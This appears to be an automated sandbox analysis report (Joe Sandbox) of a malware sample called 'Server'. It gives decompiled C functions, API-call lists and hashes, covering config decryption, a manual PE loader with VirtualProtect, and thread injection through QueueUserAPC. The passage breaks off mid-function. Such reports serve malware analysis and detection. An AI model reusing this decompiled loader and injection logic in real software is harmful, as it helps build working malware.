            				signed int _t24;
            				intOrPtr* _t26;
            				void* _t27;
            
            				_t26 = __edi;
            				if(_a4 == 0) {
            					L2:
            					_t27 = E020258BD(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
            					if(_t27 == 0) {
            						_t24 = _a12 >> 1;
            						if(_t24 == 0) {
            							_t27 = 2;
            							HeapFree( *0x202a2d8, 0, _a4);
            						} else {
            							_t21 = _a4;
            							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
            							 *_t26 = _t21;
            						}
            					}
            					L6:
            					return _t27;
            				}
            				_t22 = E02022839(_a4, _a8, _a12, __edi); // executed
            				_t27 = _t22;
            				if(_t27 == 0) {
            					goto L6;
            				}
            				goto L2;
            			}








            0x020233f1
            0x020233f9
            0x02023410
            0x0202342b
            0x0202342f
            0x02023434
            0x02023436
            0x02023448
            0x02023454
            0x02023438
            0x02023438
            0x0202343d
            0x02023442
            0x02023442
            0x02023436
            0x0202345a
            0x0202345e
            0x0202345e
            0x02023405
            0x0202340a
            0x0202340e
            0x00000000
            0x00000000
            0x00000000

            APIs
              • Part of subcall function 02022839: SysFreeString.OLEAUT32(00000000), ref: 0202289C
            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,746AF710,?,00000000,?,00000000,?,0202528E,?,004F0053,02CA9218,00000000,?), ref: 02023454
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Free$HeapString
            • String ID: Uet
            • API String ID: 3806048269-2766386878
            • Opcode ID: eea7d136d3943d6f9874935f1ecb5c0986b29eb9bc12b6db65a0b212f59a5a83
            • Instruction ID: f383a4806865dd9877bec4764ba51bdbeb89cb0d7a4eca7a6213b238cfb7c9a6
            • Opcode Fuzzy Hash: eea7d136d3943d6f9874935f1ecb5c0986b29eb9bc12b6db65a0b212f59a5a83
            • Instruction Fuzzy Hash: 37014F32501729BBCB239F54CC00FDA3BA5FF14750F558466FE099A120D735E968EB90
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E0202472F(void* __ecx) {
            				signed int _v8;
            				void* _t15;
            				void* _t19;
            				void* _t20;
            				void* _t22;
            				intOrPtr* _t23;
            
            				_t23 = __imp__;
            				_t20 = 0;
            				_v8 = _v8 & 0;
            				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
            				_t10 = _v8;
            				if(_v8 != 0) {
            					_t20 = E020233DC(_t10 + 1);
            					if(_t20 != 0) {
            						_t15 =  *_t23(3, _t20,  &_v8); // executed
            						if(_t15 != 0) {
            							 *((char*)(_v8 + _t20)) = 0;
            						} else {
            							E020261DA(_t20);
            							_t20 = 0;
            						}
            					}
            				}
            				return _t20;
            			}









            0x02024734
            0x0202473f
            0x02024741
            0x02024747
            0x02024749
            0x0202474e
            0x02024757
            0x0202475b
            0x02024764
            0x02024768
            0x02024777
            0x0202476a
            0x0202476b
            0x02024770
            0x02024770
            0x02024768
            0x0202475b
            0x02024780

            APIs
            • GetComputerNameExA.KERNELBASE(00000003,00000000,02023DCD,00000000,00000000,?,76B5C740,02023DCD), ref: 02024747
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • GetComputerNameExA.KERNELBASE(00000003,00000000,02023DCD,02023DCE,?,76B5C740,02023DCD), ref: 02024764
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: ComputerHeapName$AllocateFree
            • String ID:
            • API String ID: 187446995-0
            • Opcode ID: 8140dd6eb27aaee0fc28ee35d5a1fbcec02fcff23ccdefdf18f7bffd060df292
            • Instruction ID: 0587099bc68f91d90f121b033b5c071e5417f76a6ee8d80b310b3da4b47bca8c
            • Opcode Fuzzy Hash: 8140dd6eb27aaee0fc28ee35d5a1fbcec02fcff23ccdefdf18f7bffd060df292
            • Instruction Fuzzy Hash: 9EF05436A00329FAEB11D6AA8D40EAF76FDDBC5654F650067A914D3140EB70DA05A670
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E02025006(signed int __edx, intOrPtr _a4) {
            				void* _t3;
            				void* _t5;
            				void* _t7;
            				void* _t8;
            				void* _t9;
            				signed int _t10;
            
            				_t10 = __edx;
            				_t3 = HeapCreate(0, 0x400000, 0); // executed
            				 *0x202a2d8 = _t3;
            				if(_t3 == 0) {
            					_t8 = 8;
            					return _t8;
            				}
            				 *0x202a1c8 = GetTickCount();
            				_t5 = E020254D8(_a4);
            				if(_t5 == 0) {
            					_t5 = E0202213E(_t9, _a4); // executed
            					if(_t5 == 0) {
            						if(E02026392(_t9) != 0) {
            							 *0x202a300 = 1; // executed
            						}
            						_t7 = E02022523(_t10); // executed
            						return _t7;
            					}
            				}
            				return _t5;
            			}









            0x02025006
            0x0202500f
            0x02025015
            0x0202501c
            0x02025020
            0x00000000
            0x02025020
            0x0202502d
            0x02025032
            0x02025039
            0x0202503f
            0x02025046
            0x0202504f
            0x02025051
            0x02025051
            0x0202505b
            0x00000000
            0x0202505b
            0x02025046
            0x02025060

            APIs
            • HeapCreate.KERNELBASE(00000000,00400000,00000000,0202107E,?), ref: 0202500F
            • GetTickCount.KERNEL32 ref: 02025023
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: CountCreateHeapTick
            • String ID:
            • API String ID: 2177101570-0
            • Opcode ID: c40847a8ed34143c89320329a1d8f9b0eeafc35bc9fc29d026a10ee9b5561fa9
            • Instruction ID: 1f39110b12e1c15e851b71d182a80cb409beb1a9bcae3229026ec07f6c0bc96d
            • Opcode Fuzzy Hash: c40847a8ed34143c89320329a1d8f9b0eeafc35bc9fc29d026a10ee9b5561fa9
            • Instruction Fuzzy Hash: 4BF06D30AC0335AADBB62B709DD4B6939D97B04B04FB08827ED05D4080EB75D42CBE69
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetErrorMode.KERNELBASE(00000400,?,?,01FC0223,?,?), ref: 01FC0E19
            • SetErrorMode.KERNELBASE(00000000,?,?,01FC0223,?,?), ref: 01FC0E1E
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: ErrorMode
            • String ID:
            • API String ID: 2340568224-0
            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
            • Instruction ID: e45c7faabf02746cd53b9cede99ea59c82e8191441bed3878c85bfa3d8cc56a1
            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
            • Instruction Fuzzy Hash: 1ED01235545129B7D7003A94DC09BCD7F1CDF05B62F008011FB0DD9080CB7195414AE5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 34%
            			E02022839(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
            				intOrPtr _v12;
            				void* _v18;
            				char _v20;
            				intOrPtr _t15;
            				void* _t17;
            				intOrPtr _t19;
            				void* _t23;
            
            				_v20 = 0;
            				asm("stosd");
            				asm("stosd");
            				asm("stosd");
            				asm("stosw");
            				_t15 =  *0x202a348; // 0xc7d5a8
            				_t4 = _t15 + 0x202b3e8; // 0x2ca8990
            				_t20 = _t4;
            				_t6 = _t15 + 0x202b174; // 0x650047
            				_t17 = E0202790B(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
            				if(_t17 < 0) {
            					_t23 = _t17;
            				} else {
            					_t23 = 8;
            					if(_v20 != _t23) {
            						_t23 = 1;
            					} else {
            						_t19 = E0202661C(_t20, _v12);
            						if(_t19 != 0) {
            							 *_a16 = _t19;
            							_t23 = 0;
            						}
            						__imp__#6(_v12);
            					}
            				}
            				return _t23;
            			}










            0x02022843
            0x0202284a
            0x0202284b
            0x0202284c
            0x0202284d
            0x02022853
            0x02022858
            0x02022858
            0x02022862
            0x02022874
            0x0202287b
            0x020228a9
            0x0202287d
            0x0202287f
            0x02022884
            0x020228a6
            0x02022886
            0x02022889
            0x02022890
            0x02022895
            0x02022897
            0x02022897
            0x0202289c
            0x0202289c
            0x02022884
            0x020228b0

            APIs
              • Part of subcall function 0202790B: SysFreeString.OLEAUT32(?), ref: 020279EA
              • Part of subcall function 0202661C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02024B72,004F0053,00000000,?), ref: 02026625
              • Part of subcall function 0202661C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02024B72,004F0053,00000000,?), ref: 0202664F
              • Part of subcall function 0202661C: memset.NTDLL ref: 02026663
            • SysFreeString.OLEAUT32(00000000), ref: 0202289C
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeString$lstrlenmemcpymemset
            • String ID:
            • API String ID: 397948122-0
            • Opcode ID: 75678714377e511913675651d8b19f88f7ccfff267713be6de8b80e5f9fa1659
            • Instruction ID: 43344da481f1b5b093db51f2d3cff6db9622e0a2512d5cbdf14ef38f0918b1fd
            • Opcode Fuzzy Hash: 75678714377e511913675651d8b19f88f7ccfff267713be6de8b80e5f9fa1659
            • Instruction Fuzzy Hash: 86014C31900229BEDB529EA5CC44AEABBB9FB04654F010527ED01A7160E771D959D790
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 37%
            			E00401D3C(void* __eax, intOrPtr _a4) {
            
            				 *0x404190 =  *0x404190 & 0x00000000;
            				_push(0);
            				_push(0x40418c);
            				_push(1);
            				_push(_a4);
            				 *0x404188 = 0xc; // executed
            				L00401682(); // executed
            				return __eax;
            			}



            0x00401d3c
            0x00401d43
            0x00401d45
            0x00401d4a
            0x00401d4c
            0x00401d50
            0x00401d5a
            0x00401d5f

            APIs
            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: DescriptorSecurity$ConvertString
            • String ID:
            • API String ID: 3907675253-0
            • Opcode ID: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction ID: 8b1a9882f0f7b6f5a619b3d6300b2bdd32795284b236dc0e31706888a106ff8d
            • Opcode Fuzzy Hash: d44a2a0f54f5e6775fd6c1e8a7c4d446c5909fbbc7626a237563b1b511256517
            • Instruction Fuzzy Hash: AFC04CF4140300B7E620AB409D5AF057A5577A4715F61062DFB04391E1C3F91094952D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004012E6(long _a4) {
            				void* _t2;
            
            				_t2 = RtlAllocateHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}




            0x004012f2
            0x004012f8

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction ID: e72f98105ba7c706faca8ef9926cddb4ff6cd2f9e0c1ce1923eff6ceed1ee1be
            • Opcode Fuzzy Hash: 8d53e43e4fecd4b65d19afa8ec6fbbeba3cde750ccf00ed1d63409ce6b8d1d85
            • Instruction Fuzzy Hash: 92B012B1100100ABCA118F11EF08F06BE31B7E4701F004030B3042407482314C20FB1D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401BA9(void* _a4) {
            				char _t2;
            
            				_t2 = RtlFreeHeap( *0x404160, 0, _a4); // executed
            				return _t2;
            			}




            0x00401bb5
            0x00401bbb

            APIs
            • RtlFreeHeap.NTDLL(00000000,00000030,004017ED,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401A66), ref: 00401BB5
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID:
            • API String ID: 3298025750-0
            • Opcode ID: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction ID: ce698fd0423bda5088509b7a42681047dd9c8e559710f82c1ef419a06116bbed
            • Opcode Fuzzy Hash: 3b8eee9051a441d58e5db666830f183a15b7cffca9eb150e625e3af0535b1606
            • Instruction Fuzzy Hash: 8AB01271000100BBCA118F10EF08F067F21B7E4701F008030B3046407482314D60FB0C
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 86%
            			E004012FB(void* __eax) {
            				char _v8;
            				void* _v12;
            				void* __edi;
            				void* _t18;
            				long _t24;
            				long _t26;
            				long _t29;
            				intOrPtr _t40;
            				void* _t41;
            				void* _t42;
            				void* _t44;
            
            				_t41 = __eax;
            				_t16 =  *0x404180;
            				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
            				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
            				if(_t18 != 0) {
            					_t29 = 8;
            					goto L8;
            				} else {
            					_t40 = _v8;
            					_t29 = E00401BC4(_t33, _t40, _t41);
            					if(_t29 == 0) {
            						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
            						_t24 = E00401000(_t40, _t44); // executed
            						_t29 = _t24;
            						if(_t29 == 0) {
            							_t26 = E004014CF(_t44, _t40); // executed
            							_t29 = _t26;
            							if(_t29 == 0) {
            								_push(_t26);
            								_push(1);
            								_push(_t40);
            								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
            									_t29 = GetLastError();
            								}
            							}
            						}
            					}
            					_t42 = _v12;
            					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
            					E00401BA9(_t42);
            					L8:
            					return _t29;
            				}
            			}














            0x00401303
            0x00401305
            0x00401321
            0x00401332
            0x00401339
            0x00401397
            0x00000000
            0x0040133b
            0x0040133b
            0x00401345
            0x00401349
            0x0040134e
            0x00401351
            0x00401356
            0x0040135a
            0x0040135f
            0x00401364
            0x00401368
            0x0040136d
            0x0040136e
            0x00401372
            0x00401377
            0x0040137f
            0x0040137f
            0x00401377
            0x00401368
            0x0040135a
            0x00401381
            0x0040138a
            0x0040138e
            0x00401398
            0x0040139e
            0x0040139e

            APIs
              • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
              • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
              • Part of subcall function 00401000: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
              • Part of subcall function 004014CF: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 0040157D
              • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
            • GetLastError.KERNEL32(?,?), ref: 00401379
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
            • String ID:
            • API String ID: 3135819546-0
            • Opcode ID: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction ID: 9c7335bcc5d41c3ee7976e84fb0b4f56712358cbe666051dfec51b4dde3629c0
            • Opcode Fuzzy Hash: 336f5482e3aed059344eafb9dfd841dc67045812ccfd429b7a3489f36f6440d7
            • Instruction Fuzzy Hash: 8B11E976600301ABD711ABA68C85DAB77BCAF98318704017EFD01B7A91EA74ED068798
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 75%
            			E02025063(void* __ecx, void* __edx, void* _a4, void* _a8) {
            				void* _t13;
            				void* _t21;
            
            				_t11 =  &_a4;
            				_t21 = 0;
            				__imp__( &_a8);
            				_t13 = E02021508( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
            				if(_t13 == 0) {
            					_t21 = E020233DC(_a8 + _a8);
            					if(_t21 != 0) {
            						E020222EA(_a4, _t21, _t23);
            					}
            					E020261DA(_a4);
            				}
            				return _t21;
            			}





            0x0202506b
            0x02025072
            0x02025074
            0x02025083
            0x0202508a
            0x02025099
            0x0202509d
            0x020250a4
            0x020250a4
            0x020250ac
            0x020250b1
            0x020250b6

            APIs
            • lstrlen.KERNEL32(00000000,00000000,02023ECE,00000000,?,020266D9,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 02025074
              • Part of subcall function 02021508: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02025088,00000001,02023ECE,00000000), ref: 02021540
              • Part of subcall function 02021508: memcpy.NTDLL(02025088,02023ECE,00000010,?,?,?,02025088,00000001,02023ECE,00000000,?,020266D9,00000000,02023ECE,?,76B5C740), ref: 02021559
              • Part of subcall function 02021508: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02021582
              • Part of subcall function 02021508: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 0202159A
              • Part of subcall function 02021508: memcpy.NTDLL(00000000,76B5C740,02CA9600,00000010), ref: 020215EC
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
            • String ID:
            • API String ID: 894908221-0
            • Opcode ID: 4d14ea60311f73ee936662a5ce046e1f111b82bfb480b12e878122904b9cf70b
            • Instruction ID: 644a40abf864722077621c52d0b11cb073a4e04ccd79a80a54936afd4d650b0c
            • Opcode Fuzzy Hash: 4d14ea60311f73ee936662a5ce046e1f111b82bfb480b12e878122904b9cf70b
            • Instruction Fuzzy Hash: 1BF0303610022CBACF126E55DC40DDA3FAEEF88364B018023FD098A010DA31D659ABA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 01FC1FCF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,01FC1C63), ref: 01FC1FDE
              • Part of subcall function 01FC1FCF: GetVersion.KERNEL32(?,01FC1C63), ref: 01FC1FED
              • Part of subcall function 01FC1FCF: GetCurrentProcessId.KERNEL32(?,01FC1C63), ref: 01FC2009
              • Part of subcall function 01FC1FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01FC1C63), ref: 01FC2022
              • Part of subcall function 01FC154D: RtlAllocateHeap.NTDLL(00000000,?,01FC1477), ref: 01FC1559
            • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 01FC1C8D
            • Sleep.KERNEL32(00000000,00000030), ref: 01FC1CD4
            • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 01FC1CFC
            • GetSystemDefaultUILanguage.KERNEL32 ref: 01FC1D06
            • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 01FC1D19
            • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 01FC1D8E
            • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 01FC1DA4
            • GetLastError.KERNEL32 ref: 01FC1DB4
            • TerminateThread.KERNEL32(00000000,00000000), ref: 01FC1DBE
            • SetLastError.KERNEL32(00000000), ref: 01FC1DCA
            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01FC1DD7
            • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 01FC1DE9
            • GetLastError.KERNEL32 ref: 01FC1DF4
            • GetLastError.KERNEL32 ref: 01FC1E05
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 1666582358-0
            • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
            • Instruction ID: dd93d442ce7b91c2563cf8e31da3a8f400ebd8d190ca112a4c261394463960e6
            • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
            • Instruction Fuzzy Hash: C151C171D05516FBE721EFB89E489AFBF7CAF45B51B104029F901E2142D731CA10ABA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 93%
            			E02021D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
            				int _v8;
            				void* _v12;
            				void* _v16;
            				signed int _t28;
            				signed int _t33;
            				signed int _t39;
            				char* _t45;
            				char* _t46;
            				char* _t47;
            				char* _t48;
            				char* _t49;
            				char* _t50;
            				void* _t51;
            				void* _t52;
            				void* _t53;
            				intOrPtr _t54;
            				void* _t56;
            				intOrPtr _t57;
            				intOrPtr _t58;
            				signed int _t61;
            				intOrPtr _t64;
            				signed int _t65;
            				signed int _t70;
            				void* _t72;
            				void* _t73;
            				signed int _t75;
            				signed int _t78;
            				signed int _t82;
            				signed int _t86;
            				signed int _t90;
            				signed int _t94;
            				signed int _t98;
            				void* _t101;
            				void* _t102;
            				void* _t116;
            				void* _t119;
            				intOrPtr _t122;
            
            				_t119 = __esi;
            				_t116 = __edi;
            				_t104 = __ecx;
            				_t101 = __ebx;
            				_t28 =  *0x202a344; // 0x43175ac3
            				if(E020210F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
            					 *0x202a374 = _v8;
            				}
            				_t33 =  *0x202a344; // 0x43175ac3
            				if(E020210F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
            					_v12 = 2;
            					L69:
            					return _v12;
            				}
            				_t39 =  *0x202a344; // 0x43175ac3
            				_push(_t116);
            				if(E020210F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
            					L67:
            					HeapFree( *0x202a2d8, 0, _v16);
            					goto L69;
            				} else {
            					_push(_t101);
            					_t102 = _v12;
            					if(_t102 == 0) {
            						_t45 = 0;
            					} else {
            						_t98 =  *0x202a344; // 0x43175ac3
            						_t45 = E020236C5(_t104, _t102, _t98 ^ 0x523046bc);
            					}
            					_push(_t119);
            					if(_t45 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
            							 *0x202a2e0 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t46 = 0;
            					} else {
            						_t94 =  *0x202a344; // 0x43175ac3
            						_t46 = E020236C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
            					}
            					if(_t46 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
            							 *0x202a2e4 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t47 = 0;
            					} else {
            						_t90 =  *0x202a344; // 0x43175ac3
            						_t47 = E020236C5(_t104, _t102, _t90 ^ 0x1b5903e6);
            					}
            					if(_t47 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
            							 *0x202a2e8 = _v8;
            						}
            					}
            					if(_t102 == 0) {
            						_t48 = 0;
            					} else {
            						_t86 =  *0x202a344; // 0x43175ac3
            						_t48 = E020236C5(_t104, _t102, _t86 ^ 0x267c2349);
            					}
            					if(_t48 != 0) {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
            							 *0x202a004 = _v8;
            						}
            					}
            					if(_t102 == 0) {
